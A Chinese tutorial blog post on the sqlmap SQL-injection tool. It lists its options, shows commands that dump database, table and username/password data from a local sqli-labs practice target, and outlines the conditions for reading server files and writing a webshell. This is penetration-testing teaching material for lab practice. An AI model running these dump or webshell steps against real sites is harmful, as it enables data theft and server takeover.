作者名:白昼安全
主页面链接: 主页传送门
创作初心: 一切为了她
座右铭: 不要让时代的悲哀成为你的悲哀
专研方向: 网络安全,数据结构
每日emo:多巴胺是让人沉沦的毒,内啡肽才是意志忠实的信徒

一、Sqlmap简介与使用

当我们明白sql注入的原理,渗透过程似乎很简单。但事实上,在实际的渗透当中,漏洞注入并非仅仅只是通过简单的一两次尝试就能够得到测试人员想要的答案。很多时候,它需要经过许多次繁杂的尝试。所以,要提高渗透测试的效率,单纯的依靠测试人员自身的实战经验也是远远不够的。因此,我们需要渗透工具的帮助。而sqlmap就是这样一款强大而且便于操作的渗透测试工具。

sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。

1、Sqlmap的安装

Sqlmap下载地址:https://sqlmap.org/

Sqlmap安装完成后,那么即可开始使用。

2、sqlmap的使用

-u

指定目标URL (可以是http协议也可以是https协议)

-d

连接数据库

--dbs

列出所有的数据库

--current-db

列出当前数据库

--tables

列出当前的表

--columns

列出当前的列

-D

选择使用哪个数据库

-T

选择使用哪个表

-C

选择使用哪个列

--dump

获取字段中的数据

--dump-all

拖库

--batch

自动选择yes

--smart

启发式快速判断,节约浪费时间

--forms

尝试使用post注入

-r

加载文件中的HTTP请求(本地保存的请求包txt文件)

-l

加载文件中的HTTP请求(本地保存的请求包日志文件)

-g

自动获取Google搜索的前一百个结果,对有GET参数的URL测试

-o

开启所有默认性能优化

--tamper

调用脚本进行注入

-v

指定sqlmap的回显等级

--delay

设置多久访问一次

--os-shell

获取主机shell,一般不太好用,因为没权限

-m

批量操作

-c

指定配置文件,会按照该配置文件执行动作

-data

data指定的数据会当做post数据提交

-timeout

设定超时时间

-level

设置注入探测等级共有五个等级,默认为1级, 这个参数不仅影响使用哪些payload同时也会影响测试的注入点,GET和POST的数据都会测试,HTTP Cookie在level为2的时候就会测试,HTTP User-Agent/Referer头在level为3的时候就会测试。总之在你不确定哪个payload或者参数为注入点的时候,为了保证全面性,建议使用高的level值。

--is-dba

判断当前用户是否为数据库管理员权限

--risk

风险等级

--identify-waf

检测防火墙类型

--param-del="分割符"

设置参数的分割符

--skip-urlencode

不进行url编码

--keep-alive

设置持久连接,加快探测速度

--null-connection

检索没有body响应的内容,多用于盲注

--thread

最大为10 设置多线程

--delay

有些web服务器请求访问太过频繁可能会被防火墙拦截,使用--delay就可以设定两次http请求的延时

--safe-url

有的web服务器会在多次错误的访问请求后屏蔽所有请求,使用--safe-url 就可以每隔一段时间去访问一个正常的页面。

--technique

指定注入类型

B:Boolean-based-blind (布尔型型注入)

E:Error-based (报错型注入)

U:Union query-based (联合注入)

S:Starked queries (通过sqlmap读取文件系统、操作系统、注册表必须 使用该参数,可多语句查询注入)

T:Time-based blind (基于时间延迟注入)

--tamper

语法:--tamper ["脚本名称"]

当调用多个脚本的时候,脚本之间用逗号隔开,调用的脚本在 sqlmap文件夹下的 tamper 文件夹中

-v ["x"]

使用sqlmap注入测试时,可以使用 -v [x] 参数来指定回显信息的复杂程度, x 的取值范围为[0~6]:

等级

解释

0

只显示python错误以及严重信息

1

同时显示基本信息和警告信息

2

同时显示debug信息

3

同时显示注入的pyload

4

同时显示HTTP请求

5

同时显示HTTP相应头

6

同时显示HTTP相应页面

二、Sqlmap自动化基础注入实战

环境:sql-lib靶场第一关,url如下

http://127.0.0.1/targetrange/sqli-labs-master/Less-1/?id=1

1、取数据库名

python sqlmap.py -u "http://127.0.0.1/targetrange/sqli-labs-master/Less-1/?id=1" --dbs --batch

效果如下

2、读取表名

python sqlmap.py -u "http://127.0.0.1/targetrange/sqli-labs-master/Less-1/?id=1" -D "security" --tables --batch

效果如下

3、读取字段名

python sqlmap.py -u "http://127.0.0.1/targetrange/sqli-labs-master/Less-1/?id=1" -D "security" -T “users” --columns --batch

效果如下

4、读取数据

python sqlmap.py -u "http://127.0.0.1/targetrange/sqli-labs-master/Less-1/?id=1" -D "security" -T “users” -C “username,password” --dump --batch

效果如下

三、sqlmap读取目标系统文件

利用sqlmap读取文件,也是需要满足条件的。

(1)当前sql注入用户必须为DBA权限(--is-dba为true)

(2)需要知道网站的绝对路径

(3)My.ini文件中的这项配置secure_file_priv=””为空

四、通过sqlmap写入webshell

Sqlmap写入webshell也是和手工写入webshell一样需要满足条件:

(1)当前sql注入用户必须为DBA权限(--is-dba为true)
(2)需要知道网站的绝对路径
(3)My.ini文件中的这项配置secure_file_priv=””为空

这个操作和通过sql注入的union配合into outfile原理一样,只不过sqlmap提供了一键化操作,格式如下即可

--file-write //要写入的文件
--file-dest //写入文件存放的路径

具体操作就是通过--os-shell,相信很多同学应该都会了,所以这里就不多讲了

【网安神器篇】——Sqlmap详解相关推荐

  1. 【网安神器篇】——WPScan漏洞扫描工具

    作者名:Demo不是emo  主页面链接:主页传送门 创作初心:舞台再大,你不上台,永远是观众,没人会关心你努不努力,摔的痛不痛,他们只会看你最后站在什么位置,然后羡慕或鄙夷 座右铭:不要让时代的悲哀 ...

  2. 【网安神器篇】——enum4linux枚举工具

    作者名:Demo不是emo 主页面链接:主页传送门 创作初心:舞台再大,你不上台,永远是观众,没人会关心你努不努力,摔的痛不痛,他们只会看你最后站在什么位置,然后羡慕或鄙夷 座右铭:不要让时代的悲哀成 ...

  3. 【网安神器篇】——wmic_info信息收集工具

    作者名:Demo不是emo  主页面链接:主页传送门 创作初心:一切为了她 座右铭:不要让时代的悲哀成为你的悲哀 专研方向:网络安全,数据结构 每日emo:如若相爱,便携手到老 目录 一:wmic_i ...

  4. 【网安神器篇】——Whatweb指纹识别工具

    作者名:Demo不是emo  主页面链接:主页传送门 创作初心:舞台再大,你不上台,永远是观众,没人会关心你努不努力,摔的痛不痛,他们只会看你最后站在什么位置,然后羡慕或鄙夷 座右铭:不要让时代的悲哀 ...

  5. 【网安神器篇】——mimikatz系统取证工具

    作者名:Demo不是emo  主页面链接:主页传送门 创作初心:一切为了她 座右铭:不要让时代的悲哀成为你的悲哀 专研方向:网络安全,数据结构 每日emo:绿水无忧,因风皱面 目录 一. 工具简介 二 ...

  6. 【网安神器篇】——Crunch字典生成工具

    作者名:Demo不是emo  主页面链接:主页传送门 创作初心:舞台再大,你不上台,永远是观众,没人会关心你努不努力,摔的痛不痛,他们只会看你最后站在什么位置,然后羡慕或鄙夷 座右铭:不要让时代的悲哀 ...

  7. 【网安神器篇】——hydra爆破工具

    作者名:Demo不是emo  主页面链接:主页传送门 创作初心:舞台再大,你不上台,永远是观众,没人会关心你努不努力,摔的痛不痛,他们只会看你最后站在什么位置,然后羡慕或鄙夷 座右铭:不要让时代的悲哀 ...

  8. java lombok 视频_Java开发神器Lombok使用详解

    最近正在写SpringBoot系列文章和录制视频教程,每次都要重复写一些Getter/Setter.构造器方法.字符串输出的ToString方法和Equals/HashCode方法等.甚是浪费时间,也 ...

  9. 内网安全:隧道技术详解

    目录 隧道技术 反向连接技术 反向连接实验所用网络拓扑图及说明 网络说明 防火墙限制说明 实验前提说明 实战一:CS反向连接上线 - 拿下Win2008 一. 使用转发代理上线创建监听器 二. 上传后 ...

最新文章

  1. 【Git】Git教程
  2. 攻防世界(Pwn) forgot---栈溢出;(方法一)
  3. 如何使用jMeter发送两个逻辑上相关的HTTP请求
  4. Pgbouncer 介绍
  5. 运用大数据提高政协协商能力
  6. window下zookeeper的下载启动和报错等问题
  7. Nginx性能提升--引入线程池性能提升9倍
  8. 通达信版弘历软件指标_弘历指标源码:弘历软件主要功能是什么?选股精不精准?...
  9. 使用spark-md5获取文件md5值
  10. 您的自动化测试糟透了
  11. 2Wire_2700hg系列无线路由器功率增大方法!
  12. 英语四六级翻译10:四大名著
  13. 在有无缓冲层镊酸锏(LaNiO3,LNO)的 Pt/Ti/SiO-/Si(111)基片上沉积了单层BFO多晶薄膜
  14. 什么是EasyAntiCheat.exe,为什么在我的计算机上?
  15. FF14 最终幻想14国服招待码
  16. 基于内容的视频信息检索系统
  17. 基于simulink的PN码伪码匹配的同步仿真,包括解调,伪码匹配,fft等模块
  18. Unity学习笔记(一)Unity的界面和操作
  19. 计算机地图制图成图方法,第五章 地图成图方法
  20. 飞机上可以带充电宝吗?充电宝放书包里面能不能带到飞机上?

热门文章

  1. LAMMPS 中 molecule command 的分子模板
  2. Android开机启动速度优化 app启动速度优化
  3. Linux下Shell命令小结(转载自StartOS,【原来的雨林木风】)
  4. access数据库出现操作必须使用一个可更新的查询的解决办法
  5. [和管子对话] 1 2007-4-5/对面向对象的你言我语
  6. 特效师新人作品指引。
  7. 【Qt 开源音视频框架模块QtAV】03:QTAV主要接口展示以及播放器源码分享
  8. vCenter Server Appliance(VCSA ) Windows 版本 6.7部署指南
  9. 创始人专访 | Paul:听到自己的学员取得科研成功,是最大的幸福之一
  10. openGL3D机器人鼠标变换视角,键盘移动